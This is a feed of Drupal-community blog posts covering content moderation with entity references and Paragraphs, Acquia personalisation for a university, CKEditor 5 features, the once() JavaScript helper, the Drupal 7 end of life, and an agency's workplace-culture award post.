Entity reference fields are probably the most common way of relating two entities together. Drupal core does that extensively. Examples of this are: when assigning Users as authors to Nodes, in file or image media fields, when using Taxonomy Terms, etc. This means that often the “components” of your content will likely be an entity of some sort, and you will probably be using entity_reference fields to put your components together.

Another prevalent approach to creating structured content is the Paragraphs contributed module. The Paragraphs module lets you pre-define your components (called “paragraphs” under the hood), and by doing so, you ensure their appearance is consistent when rendered. Content editors can choose on-the-fly which paragraph types they want to use when creating the page, and you know the components will always look the same. We will get into more details about this option later.

Challenges when moderating structured content and inline editing

Consider one of the simplest and most common content modeling scenarios: a page (node) with an entity_reference field to another node. Let’s assume the main page is a “Bio” profile page, and the component we are interested in is called “Location.”

Note on implementation choices for your components: Using nodes as the data storage mechanism for components that don’t have a standalone version (page) is common but requires additional contributed modules, such as micronode, rabbit hole, etc. Other approaches and modules that don’t use nodes are equally valid, such as using core Content Blocks, the micro-content module, or even custom entities that you create in code. However, for the purposes of this example, all of these approaches are equivalent since they all use an entity-reference field to relate the host entity with the target entity (component).

By default, Drupal core doesn’t provide a great UX for inline editing. For example, the entity reference field only comes with an autocomplete widget by default, which means that when creating a Bio node, we aren’t able to finish the page unless the Location we want to use is already created.

We can add inline editing of referenced entities through different contributed modules, and Inline Entity Form and Entity Browser are the most popular solutions. If we configure Inline Entity Form, for example, we will get a node form similar to the one below: 

The whole UX could still arguably be improved, but for the sake of this example, let’s assume this is what our editors usually work with. After creating a first published version of our page, we would have something like: 

 Sometime after this page is published, the editor needs to perform a few modifications, which will require review and approval before going live. Content moderation to the rescue! They can just create a new draft, right?

 If we don’t pay close attention, everything seems to have worked as expected, since when we save the form, we see the /node/123/latest version of that page, which is a forward (unpublished) revision, and this indeed contains all changes we expect to get approved before they go live:

However, if we log out and visit the currently-published version of this page, we see that the new office location for the bio is already live. That's not what we wanted. 

We edited a draft. So how did the changes leak to the live version?

Well, it turns out that is indeed the expected behavior. Here is what happened.

When the editor clicks on the “Edit” button, they are opening the edit form of that referenced node entity. Once entity_reference fields only store information about the entity type and entity ID, the action being performed really is “let’s modify the default revision of this referenced entity, and save that as a new default revision.” This is the same as if they went to /node/45/edit and edited the location node there. Editing the referenced entity like this is almost never what you want to do in the context of using an inline form because it will:

  • Affect this (re-usable) component everywhere it may be being used
  • Even if it’s not being used elsewhere, in this scenario, it will change the location entity default revision, so the published content referencing it will reflect the changes immediately.

How to mitigate or reduce the risk of this happening on your site

There is no one-size-fits-all solution for these dangers, but you can minimize the risk.

Train your editors

If your editors understand how revisions and moderation workflows work, they can more easily work around CMS limitations when necessary. For example, in this case, it might be enough just to remove the reference to that particular Location component and create a new node instead. When the main page draft is published, it will display the new node instead of the old one. Admittedly, this is not always possible or desirable in all scenarios and teams.

Avoid inline editing when moderation workflows are in place

If editors have to go to the standalone form to modify the referenced content, this might make it more visible that the changes could affect more instances than desired.

Use helper contributed modules to reduce confusion

There are modules created to help editors know better the repercussions of the editorial changes. For example, the Entity Usage module can be configured to display a warning message in the edit form when we are altering content referenced from other places. Additionally, the Entity Reference Preview module helps editors preview unpublished content that references items that also have forward revisions.

Architect your implementation to account for the scenarios your editors will find

Maybe none of the mitigation ideas mentioned above are enough for you, or you need a more robust way to guarantee your inline edits in moderated content will be safe regardless of the editor’s skills. In this case, you might want to consider stopping the use of entity_reference fields to point to entities as components and start using the Paragraphs module instead.

What is different with Paragraphs?

The Paragraphs module still creates entities to store your components' data, but the difference is that it enforces that a given revision of the component (paragraph) is always tied to a specific revision of the host entity (parent). In fact, this is often referred to by developers as a “composite entity,” meaning the paragraph itself is only ever expected to exist “in the context of its parent.”

This solves our problem of inline editing moderated content nicely since when we create a new draft of the parent content, we will also be generating new draft revisions of all components on the page, which will always travel together through the moderation workflow.

This also has some downsides you should consider when choosing your implementation model. For example, in a paragraphs scenario, your components can’t be re-used directly. You will need to create one-off versions of a given component every time you need to place it on a page. Also, depending on your content model, if you have deep nesting levels of components inside components, the UX for inline editing might be tricky. On sites with a high volume of data, this could lead to large database tables since all revisions of all components will be created independently.

Conclusion

If you have to take one thing from this read, it should be “be careful with inline editing of referenced content in entity_reference fields when using content moderation.” This is a high-risk scenario that you should discuss early in the project with all stakeholders and plan accordingly. Unfortunately, there is no one-size-fits-all solution, and you should create your Drupal architecture to best serve the use cases that matter for your site users.

Page-building strategy is a complex subject that we haven’t explored in depth here either. Layout Builder options, embedding content in WYSIWYG areas, re-usability of components, media handling, translation workflows, theming repercussions, decoupled scenarios, etc., are all topics you should have in mind when deciding on a page-building approach. Understanding how revisions, entity_reference fields, and content moderation all play together is a good start.

Lullabot has helped plan and build editorial workflows for organizations of all shapes and sizes so that Drupal helps them work toward their content goals. If you want proven help navigating these issues, contact us.

Nov 20 2023
Nov 20

For a web team, targeting the right audience is always a top priority. When it comes to broader audiences, one user may engage with a particular piece of content, while another may not.

Therefore, it is often necessary to turn to the solution of personalisation.

Acquia developed a Personalisation tool to enable the segmentation of user groups, create campaigns targeted to different audiences across multiple channels, and conduct A/B tests on the content with no reliance on code beyond the setup.

Like many other higher education institutions, the University of Portsmouth (UoP) found that they attracted a student body with a wide range of interests. Therefore, they needed a personalisation solution with the following objectives:

  • The ability to substitute an existing page element with personalised content.
  • The ability to add a new component to the page for the target audience, without changing an existing component

Making it simple

In order to prepare the site for personalisation, installation of the Acquia Personalisation module was required as well as connecting UoP’s Drupal site with the personalisation platform on Acquia Cloud.

Once prepared, content can be created on Drupal following the regular workflow. Since the UoP site is component based, this involved adding multiple components which would therefore generate the personalised site content. 

Designing a personalised experience on the Acquia personalisation platform is an intuitive and user friendly process which requires:

  • Segmenting and defining the target audience - Determining who will view your campaign content.
  • Creating a new campaign - Indicating the URL and segment to start building the experience by adding personalisation containers. Through the provided ‘point and click’ interface, editors are able to visually select their personalisation containers.
Edit Slot
  • Assigning the replacement content - Choosing a component from the Paragraphs library to replace the original content that has been labelled as a personalisation slot.
  • Previewing and publishing the campaign.

The personalisation module operates by substituting the existing content with the desired, campaign related component on the personalisation platform. This is what enables the user to see more relevant content in comparison to the default site content.

Therefore, identifying which container needed to be targeted, as well as creating a system that allowed users to standardise this selection, was a crucial step in the process and a key factor for a successful replacement.

Zoocha tackled this by providing every component available for personalisation with a container including a personalisation-container class and a unique data-personalisation-id that could be easily found on the Acquia interface.

class=”page__components”>

<div class=”personalisation-container personalisation-containertextdata-personalisation-id=”0001”> div>

<div class=”personalisation-container personalisation-containercard-griddata-personalisation-id=”0002”> div>

<div class=”personalisation-container personalisation-containercard-griddata-personalisation-id=”0003”> div>

<div class=”personalisation-container personalisation-containertabsdata-personalisation-id=”0004”> div>

</article>

The benefits of this approach were:

  • Consistent personalisation experience. Editors will be able to identify the correct container with ease anywhere on the site, based on a shared structure for all components.
  • Simple scalability. New components can be enabled for personalisation and integrated into the existing shared implementation at any point.
  • Clean HTML markup. The personalisation container is placed a level directly above the individual component templates via a preprocess. This prevents part of the original component from remaining on the markup after the personalisation content swap, avoiding unnecessary nesting and DOM elements that may impact performance.

A smooth process

With the implementation of the personalisation feature, we were able to provide the University of Portsmouth with a powerful tool to reach their broad audiences in a clean, easy to use and scalable method.

We’re looking forward to seeing their campaigns come to life!

Personalisation Dashboard
Nov 20 2023
Nov 20

CKEditor is a powerful and versatile web-based text editor commonly used in content management systems like Drupal. It empowers content creators and editors with a user-friendly interface for crafting and formatting text, incorporating multimedia elements, and managing a wide range of content types.

CKEditor 5, the latest iteration, introduces a host of major enhancements and new features, from a fresh, modern design to advanced features that streamline content creation and will bring a leap forward in productivity. This new and exciting version of CKEditor comes as part of Drupal 10 out of the box, so provides a great benefit when upgrading your current Drupal site.

In this article, we'll delve into CKEditor 5's impressive capabilities, focusing on its revamped appearance, link management, image handling, table editing, font customisation, HTML embedding, and the exciting premium features it brings to the table. Let's jump in and explore the creative possibilities CKEditor 5 offers for enhancing your digital content.

Header image - Drupal 10 blog

Drag and Drop

CKEditor 5's drag-and-drop feature transforms the content editing experience, providing unparalleled convenience for editors. This functionality allows content editors to effortlessly rearrange text, paragraphs, tables, and lists within the editor, enhancing the fluidity of content composition. The ability to move entire blocks or multiple elements with a simple drag-and-drop action offers a significant time-saving advantage, streamlining the editing process. Moreover, content editors can seamlessly import HTML or plain-text content from external sources, simplifying the integration of images into their work. This feature not only improves efficiency but also empowers editors with greater control and flexibility in crafting visually appealing and well-organised content.

Links

One area that's seen noteworthy improvements is link management. Adding links in CKEditor 5 is now more intuitive and user-friendly, as a convenient pop-up box appears within the WYSIWYG window. This makes the process smoother and faster. These link options can be combined with Drupal’s 'Editor Advanced Link' module, which empowers content creators with the ability to fine-tune their links. With this module, editors can define attributes such as title, CSS classes, IDs, link targets, 'rel' attributes, and ARIA labels, which are essential for providing users who use assistive technology like screen readers meaningful information about the purpose or content of the link. 

These enhancements offer a wealth of customisation options for links, whether it's for accessibility, branding, or precise styling. CKEditor 5 and the 'Editor Advanced Link' module together bring a logical link management experience to Drupal, making the process more efficient and versatile.

Links

Image Handling

Adding images to your content using CKEditor 5 has been given an upgrade thanks to the new drag-and-drop functionality. Users can simply select an image, whether it's from their device or a webpage, and simply drag and drop it into the WYSIWYG window. Once the image is incorporated, you have the option to designate it as decorative (meaning it doesn't add information to the page and, therefore, does not require alt text) or provide the alt text.

Furthermore, you can fine-tune the image presentation by adjusting its alignment and text wrapping options, all conveniently accessible from the image-dedicated balloon toolbar. If you wish to enrich your image with a link or a caption, you can easily achieve this without leaving the image toolbar.

Drupal blog image 2

Links

When you're ready to adjust the image size, CKEditor 5 simplifies the process by allowing you to resize the image directly within the WYSIWYG window. A straightforward corner selection and drag operation lets you customise the image to your desired dimensions.

Moreover, CKEditor 5 integrates with Drupal media. Once the necessary modules are enabled, you'll discover a new button in the text editor toolbar configuration. Add this button to your active toolbar, specify the media types and view modes you want to make available and save your preferences. You can then conveniently add new media files or select from your media library, following the standard workflow you're accustomed to (you are restricted with resizing the image when using the library). CKEditor 5, along with its compatibility with Drupal media, enhances the image management experience, making it a user-friendly and efficient process.

Table Management

Enhancements to table management in CKEditor 5 bring an improved editor experience. While currently requiring a patch to be added to Composer, the effort is undoubtedly worthwhile for those who frequently utilise tables in their content.

You can specify the number of columns and rows and include an optional title for the table. Once your table is set up, a wide array of editing options becomes available, providing greater flexibility and control over table and cell properties. These edits encompass essential functionalities, such as adding or removing columns and rows, merging and splitting cells, and customising styles for both the entire table and individual cells. You can fine-tune text alignment and even introduce background colours to enhance the visual appeal of your tables.

CKEditor 5 also offers the capability to nest tables within the cells of other tables, providing a versatile tool for crafting intricate charts or layouts based on table structures. This feature allows content creators to format the nested table with the same ease and flexibility as a standalone table, enhancing the possibilities for designing complex and well-organised content layouts.

Table Management

These improvements in CKEditor 5 make working with tables more efficient and user-friendly, empowering content creators to present their data and content in a structured and visually appealing manner.

Font Handling

Modify fonts in your content with CKEditor 5. By installing the 'CKEditor Font Size and Family' module, you can unlock a wide range of font and text editing options right on the WYSIWYG screen. With just a few simple configuration tweaks within the text editor, editors gain the ability to not only adjust font sizes and families but also apply text colours and text background colours, enhancing the text's visual appeal and customisation possibilities.

Font Handling

Other Exciting Extensions for CKEditor 5 to Explore

Auto Save

The Autosave feature is a significant enhancement. It automatically saves your data, sending it to the server when necessary, ensuring that your content is safe, even if you forget to hit 'Save.' While it does require installation and some code, the peace of mind it offers is well worth the setup time.

Markdown

With the Markdown plugin, you can switch from the default HTML output to Markdown. This is fantastic for those who prefer a lightweight, developer-friendly formatting syntax. The best part? It's available right out of the box, making content creation more flexible and efficient.

To-Do Lists

CKEditor 5's To-do list feature is a handy addition to your content creation toolkit. It enables you to create interactive checkboxes with labels, supporting all the features of bulleted and numbered lists. You can even nest to-do lists with other list types for a versatile task management experience. While it does require installation, the organisational benefits it brings are worth the minor setup work.

Premium Features

Unleash CKEditor 5's premium features with ease. Install and enable the 'CKEditor 5 Premium Features' module, configure it by adding your licence key, and adjust your text editor's toolbar. Then, you're ready to explore the exceptional features, including track changes, comments, revision history, and real-time collaboration, which enhance collaborative editing, discussions, version control, and harmonious teamwork, streamlining content creation and review for improved efficiency and precision.

Track Changes 

The Track Changes feature brings a dynamic experience to document editing. It automatically marks and suggests changes as you make them. Users can quickly switch to the track changes mode, where all edits generate suggestions that can be reviewed, accepted, discarded, or commented on, enhancing the collaborative editing process.

Revision History

The Revision History feature can be your trusted document versioning companion. It empowers you to manage content development over time with ease. Unlike Drupal's default revision log feature, The preview mode offers a comprehensive view of content changes and the contributors behind them, all within the editor. Users can compare and restore previous document versions.

Comments

With the Comments feature, users can annotate specific sections of content, whether it's text or block elements like images. It facilitates threaded discussions and provides the flexibility to remove comments once discussions are concluded, fostering effective collaboration and feedback.

Real-Time Collaboration

Real-Time Collaboration enables multiple authors to work concurrently on the same rich text document. Additionally, it provides a user presence list, offering a live view of active participants in the document. While other collaboration features can be used asynchronously, real-time collaboration allows for instantaneous teamwork.

Import Word/Export Word and PDF

Import word/Export word/& PDF:  When installed, the module allows for the easy importing and exporting of the above formats. While the export functionality is fully stable in CKeditor, the converters are considered experimental for Drupal at this time. The import of .docx & .dotx files will retain the formatting, comments and even track changes. 

Notification System

Alongside these collaboration features, CKEditor will be introducing a new notification system to keep editors and writers well-informed about the content's status. Stay up-to-date with real-time notifications, ensuring a smoother editorial workflow.

Productivity Pack

The Productivity Pack is a bundle of Premium features which make document editing faster, easier, and more efficient.


The Productivity Pack features include:

  • Templates allow you to create and insert predefined content structures into the editor, saving time and ensuring consistency in the content display.

  • Slash Commands lets you execute actions using the / key as well as create your own custom actions. This can help to streamline content creation, reducing navigation through the editor options and saving time.

  • Document Outline adds an automatic outline of the document headings in a sidebar to help navigate the document.

  • Table of contents inserts a linked table of contents into the document, which automatically updates as headings are added and will be retained in the editor output data.

  • Format Painter copies text formatting and styles and applies it to a different part of the content. This helps to ensure consistent formatting across the content, saves editor time and contributes to a more professional appearance.

  • Paste from Office Enhanced provides error-free copy-pasting from MS Word and Excel. Formatted text, complex tables, media, and layouts are retained – turning MS Office content into clean HTML.

The module also provides a Full-screen plugin that maximises the editing area which is very useful when using the premium features such as comments and Document outline as they take up extra space around the editor.

Demos of these CKEditor 5 features are available from links within the module project page. There are many other non-premium and premium features that can be installed outside of the Drupal module with some developer involvement, which can be found here.

Conclusion 

In this article, we've explored CKEditor 5's significant enhancements for content creators and editors in Drupal 10. CKEditor 5 offers improved link management, effortless image handling, streamlined table editing, versatile font customisation, and simplified HTML embedding. We've also touched on exciting extensions that enhance your content creation process.

Furthermore, CKEditor 5's premium features, like Track Changes, Revision History, Comments, Real-Time Collaboration, Import/Export for Word and PDF, Notification System, and the Productivity Pack, bring advanced capabilities for collaborative editing and efficient content creation.

As you dive into CKEditor 5's features, we encourage you to explore further and experience the benefits firsthand. It's a game-changer for content editing and collaboration in Drupal 10. Unleash your creativity and discover a more efficient and professional content editing experience with CKEditor 5.

Nov 17 2023
Nov 17

Once is a Drupal library - available on npm - that ensures your JavaScript only runs once when working on any item.

I put a snippet on a Slack channel recently suggesting that someone should use once() to make sure their code didn't run multiple times. And then I gave them this snippet to show how to use it:

const editFrequencys = once('allEditFrequencies', '.edit-frequency', context);

editFrequencys.forEach(editFrequency => {
  editFrequency.on('change', function() {
    $.ajax({
      method: "POST",
      url: "/frequency-select",
      data: { name: "John", location: "Boston" },
      dataType: "json"
    })
      .done(function( data ) {
        console.log("It's done!");
        console.log(data);
      });
  });
});

Job well done, Mark, you might say. Yes, but then the author asked me:

What are the different arguments about in the first line?
I've seen this code in searching for an answer, but nothing ever explains what/why the arguments for the "once" are for.

And that reminded me of a younger me. Me about 6 months ago, when I first tried to use once(). So here is the explanation I gave them:

const editFrequencys creates a variable for what you want to work on. It’s a plural, because once always returns an array. You could do something like const [editFrequency] to just return one item if you were sure there was only ever going to be one of the thing you are looking for on the page. But I find it better to return the array just in case in the future a second instance of the thing is on the page.

once() is the function that will ensure the code that is acting on your “thing” will only act once.

'allEditFrequencies' is a name that we assign to this item. You can assign anything to it basically, such as 'justSomeStuff'. This is then attached to the property in your DOM via a data attribute, such as data-once="allEditFrequencies" so JS knows which once function this item belongs to.

context is just the method that is going to be used to find your array. You could use document here, but if the page gets updated via ajax, then document will not be updated, so in Drupal terms, context is probably better.

If I got something wrong there, or there's something I should update, let me know.

Share (please)

Filed Under:

  1. Drupal
  2. Drupal Planet
Nov 16 2023
Nov 16

Host Matt Kleve assembles a crack team of Lullabot experts from various company departments to share their hands-on experiences and insights into how innovative technology influences and enhances our field.

We discuss integrating AI into coding, design, and tasks like writing emails and RFP responses, along with the broader implications for the future of web development.

Join us as we navigate the complexities, challenges, and vast potential of Generative AI in shaping our world.

Nov 15 2023
Nov 15

That’s a question we sometimes ask clients or people we meet at Drupal events. 

It’s a rhetorical question, of course. The answer is always at least “10.” 

There’s rarely any need to expound upon the pivotal role that websites play in the current climate.

For higher education, websites represent make-or-break first, second, and third impressions, and much more. 

County and municipal government websites now function as a virtual town square – the place for taking care of official business, showcasing major attractions, appealing to tourists, supporting business, and whole host of other functions.

For enterprise and non profits, the required heavy lifting runs equally deep and wide

That’s why many of us in the Drupal Community are puzzled about the significant percentage of Drupal sites that are still on Drupal 7.

Is Legacy Technology Up to the Task?

If you are reading this blog, chances are that you get it: Drupal 7 legacy technology. For others in your organization, though, who don’t know the chasm that exists between Drupal 7 and the possibilities inherent in Drupal 10, a Drupal 7 site might seem just fine. 

We can (and will) cover the big differences between Drupal 7 and 10, but first, for the sake of perspective, let’s look back 14 years to some of the technologies that were exciting and considered leading edge in 2011 – the year that Drupal 7 was released. 

  • The iPhone 4s, which represented a significant advancement over previous models, was unveiled on October 4, 2011. 
  • That same year, the BlackBerry Bold 9900 had become quite coveted for its physical keyboard and secure messaging capabilities.

2011 tech

  • Samsung Galaxy S2 was the flagship Android smartphone in 2011.
  • The Nintendo 3DS handheld gaming console featured autostereoscopic 3D technology, and was viewed as innovative in 2011.
  • Sony Walkman MP3 Players were still popular in 2011.
  • Compact camcorders such as the Flip series, were viewed as extremely impressive for the capabilities that were contained within such a small size.
  • Netbooks were popular in 2011 – soon to be eclipsed by more powerful and versatile Ultrabooks and tablets.
  • Compact digital cameras were still widely used in 2011.
  • Finally, standalone GPS navigation devices, such as the Garmin, were viewed as sophisticated devices for people who could afford this level of technology in 2011. They were far more prevalent than GPS-enabled smartphone apps. 

Kicking off a year of exciting technological advances, Drupal 7 was released on January 5, 2011, and gained popularity for its flexibility and extensive contributed module ecosystem.  

Unlike subsequent versions of the CMS, Drupal 7 was accessible to hobbyists and small website owners. Drupal 8 marked a new evolutionary trajectory – away from hobbyist-friendly and toward a uniquely enterprise-ready CMS, distinctly suited for ambitious sites with complex content models.

Impending Drupal 7 End of Life

Drupal 7 was originally slated for end of life in 2021 – six years after the 2015 release of Drupal 8. That first end-of-life date was initially extended by one year in the midst of  upheavals and uncertainties surrounding a global pandemic. 

As Drupal Community migrations to Drupal 8 and then 9 proved to be more of a more of a trickle than the required surge, the end-of-life date was extended again to 2023. A final Drupal 7 end-of-life date of January 5, 2025 was announced in June of 2023 at DrupalCon Pittsburgh. To review: end of life means no more bug fixes or security patches, along with an increased risk of faulty modules.

Drupal 7 Disintegrating

Dropoff in Drupal 7 Community Support

It’s critical for anyone who is still on a Drupal 7 site to realize that even though the official end-of-life date is not until 2025, community support is already on the decline. 

The Drupal Association announced that effective August 1, 2023, the Drupal Security Team may choose to not publicly post in the public issue queue for resolution, moderately critical and less critical issues affecting Drupal 7. When a security issue affects both Drupal 7 and Drupal 10, the Drupal 10 security advisory may be released without a corresponding Drupal 7 fix.

Additionally: 

  • Drupal 7 branches of unsupported modules and themes are no longer eligible for new maintainership. 
  • The Drupal security team will not issue security advisories for any unsupported libraries that Drupal 7 contributed modules or themes rely on, such as CKEditor 4.
  • PHP 5.5 and below will no longer be supported on Drupal 7.
  • Security fixes will no longer be provided for Drupal 7 Windows-only issues. Anyone running a Drupal 7 site on Windows, is advised to look into migrating to another operating system for hosting.

Why Are So Many Websites Still on Drupal 7?

There’s no denying that a Drupal 7 migration is a big lift, requiring a fresh, new build  that consumes budget and resources. An ROI analysis does not need to dig exceptionally deep, however, to conclude that upgrading to a more scalable, secure, efficient, and feature-rich web platform is worth the investment many times over. 

Promet Source is a certified Drupal migration partner.

Multiple factors determine the actual cost of a Drupal 7 to 10 migration. Migrating a simple brochure site with a few pages and basic functionality, can be a simple and streamlined process. Degree of customization and complex data structures will considerably compound the cost . 

In many cases, a Drupal 7 site represents more than a decade of complex customization and a comfort zone that stakeholders can be hesitant to let go of. Leveling up requires a bit of letting go. Experienced and adept migration partners understand this important factor have the skills to navigate clients through planning process with the assurance that migrated functionalities will make it to the other side and onto a CMS that’s inherently more flexible and stable.  

It’s helpful to note that  a significant number of contributed modules have been ported to Drupal 10 and most of the popular ones have been integrated into Drupal core. While some modules have been deprecated, any Drupal 7 integration or custom modules can be rebuilt for Drupal 10.  

Drupal 10 architecture vastly simplifies integrations and data exchange with third-party applications. 

It’s been our experience that the biggest barrier to migration from Drupal 7 is simply a lack of understanding concerning the speed, usability, power and potential of Drupal 10.

This lack of understanding, combined with inertia can fuel an  "if it's not broken, don't fix it" level of complacency, for Drupal 7 sites that have not experienced major issues.

What are the Advantages of Drupal 10 vs. Drupal 7? 

Drupal 10 is simply better, and for Drupal website stakeholders who are clear on the fact that their website represents an essential strategic and operational driver to every aspect of their organization, it’s important to maintain a sharp focus on the Drupal 10 difference while helping to bring others in the organization on board. Here are some essential advantages of Drupal 10:

  • Improved Performance. Drupal 10 is designed to offer better performance and scalability compared to Drupal 7. It has enhancements in terms of speed, caching, and optimization, which can lead to a more responsive and faster website.
  • Mobile Responsiveness. Drupal 10 has improved support for responsive web design and mobile devices out of the box. Drupal 7 may require additional modules and custom development to achieve the same level of mobile friendliness.
  • Better Content Editing Experience. Drupal 10 offers an improved content editing capabilities, with the integration of the Layout Builder into core, making it easier for non-technical users to create and edit content layouts. Drupal 10 also provides an easier-to-use WYSIWYG editor and more streamlined content management tools compared to Drupal 7’s more basic content editing interface.
  • Accessibility. Drupal 10 places a stronger emphasis on web accessibility, making it easier to create websites that are compliant with accessibility standards. While accessibility features can be retrofitted into Drupal 7 sites, there is a significant level of assurance that comes from knowing that accessibility is built in.
  • Developer Friendly. Drupal 10 offers a more robust and developer-friendly architecture, with support for modern PHP versions, improved APIs, and easier integration with other technologies.
  • Modern and Flexible Theming Options. Drupal 10 leverages the Twig templating engine to provide more flexibility and modern theming options. Drupal 7 uses PHP templates for theming.
  • Extensible Architecture. Drupal 10 offers a flexible and extensible architecture with improved APIs, making it easier for developers to create custom functionality and integrate with third-party systems.
  • Configuration Management. Drupal 7 lacked a robust configuration management system, making it more challenging to export and import site configurations. Drupal 10 has a comprehensive configuration management system, allowing for easier-to-manage configuration changes across different environments.
  • Multilingual Capabilities. Drupal 10’s enhanced multilingual support, enhances multiple capabilities, making it easier to create websites in multiple languages. Drupal 7 also supports multiple languages but lacks many of the Drupal 10’s advanced features. 
  • Decoupled Architecture. Drupal 10 better supports decoupled or headless architecture, enabling the use of Drupal as a backend and with the use of various front-end technologies, such as React, Vue.js, or Angular. Drupal 7’s support for decoupled setups is limited.  
  • Progress toward Automatic Updates. Drupal sites have traditionally required manual upgrading. The Drupal Automatic Updates Initiative is designed to allow for built-in security fixes and upgrades. Progress toward automatic updates is moving forward at a steady clip. 

Latest stats show that 47.5 percent of all Drupal sites are still on Drupal 7. While there’s reason to believe that a significant percentage of them are hobbyists or small businesses, the fact is, if you are still on Drupal 7, you are not alone. But If you agree that your website is a mission critical digital property, and that remaining on Drupal 7 beyond the end of life is a sub-optimal option, let’s talk.

Nov 15 2023
Nov 15

There's a (hidden away) module in LocalGov Drupal that's a game-changer for layout possibilities.

The LocalGov Drupal Layouts module was created as part of the LGD Microsites platform, but contributed back to the core LGD project. However, it is not turned on by default (todo: propose it gets turned on by default), so I think a lot of people are not aware of it.

Here's a short demo of how to enable it and use it. Then you can extend it to add as many layout options as you want to your LGD layouts.

If you'd like to chat about how you might use this, connect with me on the LGD slack or via the Annertech contact form.

Nov 15 2023
Nov 15

Introduction

This article narrates some of the things that we, at Axelerant, practice consciously to make it inclusive for women team members. 

Things that got us the title of India’s Best Workplace For WomenTM by Great Place To Work® Institute (India).

Something like what Performance Coach Nanditha Krishnan shared about her joining experience at Axelerant.

“I’m a woman who got hired here at fifty years of age, right in the midst of COVID-19. This breaks a lot of stereotypes.” 

I’m not a woman. And I won’t pretend to know what it feels like to be one.

That’s why, the words that matter, come directly from women team members at Axelerant.

So Yeah, We Got The Award

Every year, hundreds of organizations from multiple industries vie against each other to be called—a “great” workplace.

According to the 2023 Great Place To Work (GPTW) report, “At Best Workplaces, women make up an impressive 36% of the workforce, notably 17% higher.”

Companies can win this award in different categories, too.

They recognized Axelerant in three of them.

GPTW categories won by Axelerant

How Was Axelerant Judged For This Award?

The process is straightforward.

You fill up a form about all the systems and practices in place that ensure a great workplace culture in your organization and submit it to GPTW.

They read the responses, then survey each team member. Anonymously.

And there’s also a bit where they call team members randomly and ask about their responses.

So the chances of lies creeping into the responses are pretty low. 

Ultimately, they compare the results from all organizations nationwide, and award companies for investing time, effort, and resources to ensure a positive workplace culture.

Here Are Some Possible Reasons Why

You may be thinking by now: what’s so great about this organization that they bagged an award for it? 

Some factors come to mind. But mind you, you may not see them as that great. Or noteworthy even.

That’s alright.

However, some of our women team members have benefited significantly from having access to these practices.

Apply at Axelerant by clicking here. We believe people grow better with kindness and support.

Remote Work, The Great Equalizer

Hundred percent remote work means anybody can work from any corner of the world.

An increasingly rare phenomenon—even after the pandemic proved that people didn’t really need to come to a physical location to work together.

In some ways, hybrid workspaces are even worse. 

Because it often creates a boundary between people working from the office and the home.

In pay, promotion, and opportunities, office workers get the upper hand

And remote workers are mostly treated as second-class team members.

A 100% remote work opportunity levels the playing field. Nobody gets a brownie point for dragging their body to the office.

Sure, we realize that not everyone can work from home when working remotely.

That’s why we have the monthly co-working space allowance, so that women who need their personal space, away from familial commitments, can rent an office space.

They have the option to choose their workplace every day.

Flexibility To Work Whenever, Wherever

The work-life flexibility that our team members experience has been consistently voted as the top benefit at Axelerant.

We trust team members with the choice of planning and working according to their own time availability. 

The work matters. When and how one does it is up to the individual.

It allows team members to divide their time between personal and professional commitments.

"My kids' school doesn't have a school bus. Because of flexible hours, I get to drop and pick up my kids from school and not fear relying on an unknown person," said Project Manager Merlyn Fernandes.

For team members who are mothers, being close to their children and watching them grow up is a blessing.

Shweta_s status update on work-life flexibility

“As a mother of two kids, if I didn’t have the time to spend with my children, I would’ve not been happy and satisfied either as a professional or a parent. This work-life flexibility is what keeps me going, keeps me happy. I feel successful. And it wouldn’t have been possible without Axelerant,” Sivagami Vasudevan, Technical Workforce Manager, shared. 

These answers confirm what the 2023 GPTW report discovered:

Working in a flexible working environment boosts long-term female team member commitment to work by a significant 15%.

Childcare Allowance To The Rescue

Raising children is as rewarding as it is challenging. 

Hetal Mistry, Director of Global Delivery, found herself in a tough spot when schools shut down in the pandemic in 2021.

Her son needed her attention, and so did her husband after undergoing a serious medical procedure. 

Between family and work commitments, Hetal was stretched thin.

"I raised a question about having a childcare allowance, and it was immediately brought into policy. I felt like a genuine need was heard and acted upon," she shared.

In fall 2021, Axelerant began assisting team members with childcare allowance to support parents and guardians with younger kids for daycare or caretaker expenses.

Delivery Operations Specialist Manjula Balnarayan said, "The child care allowance gave me that extra financial support to care for my toddler."

Caregiver Leave For Emergencies

Every team member enjoys 35 days off annually. 

No sneaky conditions.

You can take Friday and the following Monday off; the weekends won't be counted as leave. 

Clubbing sick and paid leave isn't a cardinal sin—because all off-days are equal.

And you can apply for them whenever and however you want. 

Apart from these 35 days, there's something called Caregiver Leave.

Caregiver leave

It allows team members to take up to 10 days off annually to assist their dependents with medical conditions or a health event requiring emergency care. 

Like emergency hospital admission, an unexpected illness, or last-minute care arrangements. 

Dependents usually mean direct family members, like children, parents, adoptees, partner or spouse, and in-laws.

Equal Pay

It’s embarrassing that we’re still discussing this in the 21st century.

But hey. . .reality. 

The womenfolk of Iceland—from the prime minister to the homemaker–just went on a nationwide strike about it in 2023.

Women still don’t get paid equal to men for the same work. 

We believe every person should be paid the same based on their work, not their gender. And that’s what we follow.

As a People Operations Manager, Vishakha Pinge is involved in Axelerant’s appraisals.

“I remember a leader proactively issued an equal salary raise to a team member on maternity leave, fully aware of her absence from work for the next eight months. It was a testament to our genuine commitment to equality,” she shared.

Impartial And Equal Growth Opportunity 

Another crucial side to equality relates to growth opportunity.

“Women are not given special treatment here, like giving roses and chocolates on Women's Day, while conveniently deprioritizing their actual needs,” shared Hetal. 

Certainly, growth opportunities mean more than one-off annual gifts.

It starts with being heard and respected.

“The respect I get as a woman team player, the gender equality that everyone talks about, is not superficial here. There has not been a single day or moment where I have been spoken to or treated differently,” shared Manjula.

And fostered through impartial investment in people’s growth; for instance, through the  continuing education allowance that allows team members to take up paid courses and training for career growth and promotions.

Every person, regardless of their gender, must get equal opportunities to grow at work.

Uncompromising Support And Safety

Workplace safety comprises physical and psychological safety.

The 2023 GPTW report states: “Workplace politics and a welcoming environment have worsened for women.”

Physical safety is the bare minimum that every organization should invest in and ensure. 

And there’s psychological safety, much harder to achieve.

Psychological safety comes right from the top—from the executives and managers.

And it doesn’t happen organically.

Leaders need human skills training to be able to create safe spaces within teams. And to know how to nurture and protect it. 

Our performance coaches train Axelerant leaders through carefully crafted training courses for this very reason.

So that people feel safe to express themselves without fear.

Remote work guarantees the physical safety and comfort of working from home. 

But it doesn’t mean we compromise on people’s safety during team offsites.

